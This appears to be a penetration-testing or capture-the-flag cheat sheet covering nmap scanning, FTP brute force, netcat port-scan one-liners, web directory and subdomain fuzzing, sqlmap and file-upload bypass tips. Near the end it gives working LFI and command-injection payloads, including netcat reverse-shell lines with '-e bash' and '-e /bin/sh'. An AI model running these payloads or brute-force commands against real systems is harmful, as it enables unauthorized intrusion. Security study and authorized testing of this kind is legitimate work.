Port scanning using nmap

• Use -vvv for nmap scan to increase verbosity

# TCP Scan
> TARGET=<TARGET> && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

# Vulnerability Scan
> nmap -n -sV --script vuln <TARGET> -Pn -vvv

# UDP scan
> nmap -p- --min-rate=1000 -T4 <TARGET> -Pn -sU -vvv

# Output in all formats
> nmap -p- -sC -sV -oA tcp_all_ports <TARGET>

Specific purpose scanning

FTP bruteforce

# nmap
> nmap --script ftp-brute -p 21 <TARGET> -Pn

# hydra
> hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://<TARGET>

UDP 69 tftp

> nmap -n -Pn -sU -p69 -sV --script tftp-enum <TARGET>

Simple nc scanner

nc port scanner oneliner

# Normal scanning
> for p in {1..65535}; do nc -vn <TARGET> $p -w 1 -z & done 2> output.txt

# Using proxychains
> for p in {1..65535}; do proxychains -q nc -vn <TARGET> $p -w 1 -z & done 2> output.txt

nc port scanner script

#!/bin/bash
host=$1
for port in {1..65535}; do
 timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
 echo "port $port is open"
done
echo "Done"

Web path discovery

General tips

• Some mis-spelled paths may give a hint.
• Don’t forget to vuln-search using google.
• When GET doesn’t give anything, try POST
• If cannot find http, try https

dirb

# Using a common wordlist
> dirb http://<TARGET>
> dirb http://<TARGET> /usr/share/wordlists/dirb/common.txt

# Using a bigger wordlist
> dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt

# Amplify search with this extensions
> dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt -X .php,.txt,.json,.html

# Recursive search
> dirb http://<TARGET> -r

# Other recommended wordlists
* /usr/share/wordlists/SecLists/Discovery/Web-Content/CGIs.txt
* /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

dirsearch

> dirsearch -u http://<TARGET> -e php,asp,aspx,jsp,js,html,txt,sql -w /usr/share/wordlists/dirb/common.txt -f -r

-e EXTENSIONS, --extensions=EXTENSIONS  Extension list separated by comma (Example: php,asp)
-f, --force-extensions  Force extensions for every wordlist entry (like in DirBuster)
-r, --recursive

fuff

> ffuf -w /usr/share/wordlists/dirb/big.txt -H "Content-Type: application/json" -H "Cookie:..." -X POST  -u http://url/ -d '{"FUZZ": "value"}' -mc all -fr "specific_term" -c -v

wfuzz

> wfuzz -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt --sc 200 http://<TARGET>/FUZZ

Subdomain enumeration

gobuster

> gobuster -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt vhost -u http://<TARGET>

wfuzz

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://<TARGET>/" -H "Host: FUZZ.<TARGET>" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt

fuff

> ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<TARGET>/ -H "Host: FUZZ.<TARGET>" -fl 10

Web probing

curl

# basic-auth
> curl --user <user>:<pass> <TARGET>:<port>/pwn.php

# find all text on a page
> curl http://<TARGET>/ | html2text

# parse href in curl response
> curl http://<TARGET>/ | sed -n 's/.*href="\([^"]*\).*/\1/p'
> curl <TARGET> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

lfi

# lfi via php filter
> curl http://<TARGET>/index.php?m=php://filter/convert.base64-encode/resource=index

# lfi via string injection
> http://<TARGET>/index.php?page='.system('ls').'

cmd injection

• ${IFS} can be used as space for linux targets

> nc${IFS}<TARGET>${IFS}<PORT>${IFS}-e${IFS}bash

• %0a can be used as newline for IE and inproperly sanitised webapp

> index.php?page=user%0a<cmd-payload>

• ; can be used to concat another command

aaaa;nc+-e+/bin/sh+<TARGET>

http headers injection

• Apache log poisoning: write through User-Agent or URL into the log file and achieve RCE through LFI
• Use burp to avoid encoding issues
• http headers maybe spoofable, X-Forwarded-For: 127.0.0.1

sqlmap

# get
> sqlmap -u http://<TARGET>/login.php?search=test

# post
> sqlmap -u http://<TARGET>/login.php?login=true -p user,password --data "user=1&password=2" --method POST

Image upload

• Some the upload only checks for extension, change the extension before upload, then capture the request and change the filename parameter in the request body.
• It is preferrable to use png where possible, because the format is cleaner than jpg/jpeg

svn

• Useful when find a svn repo over the web

# get commit logs
> svn log --username admin --password admin http://<TARGET>/svn/dev/

# show differences
> svn diff -r 3:1 --username admin --password admin http://<TARGET>/svn/dev/

Exploits Search

• CTF search: https://ippsec.rocks/
• CVE POC: https://github.com/nomi-sec/PoC-in-GitHub

Useful references

• Default username and passwords: https://datarecovery.com/rd/default-passwords/
• https://book.hacktricks.xyz/
• https://www.hackingarticles.in/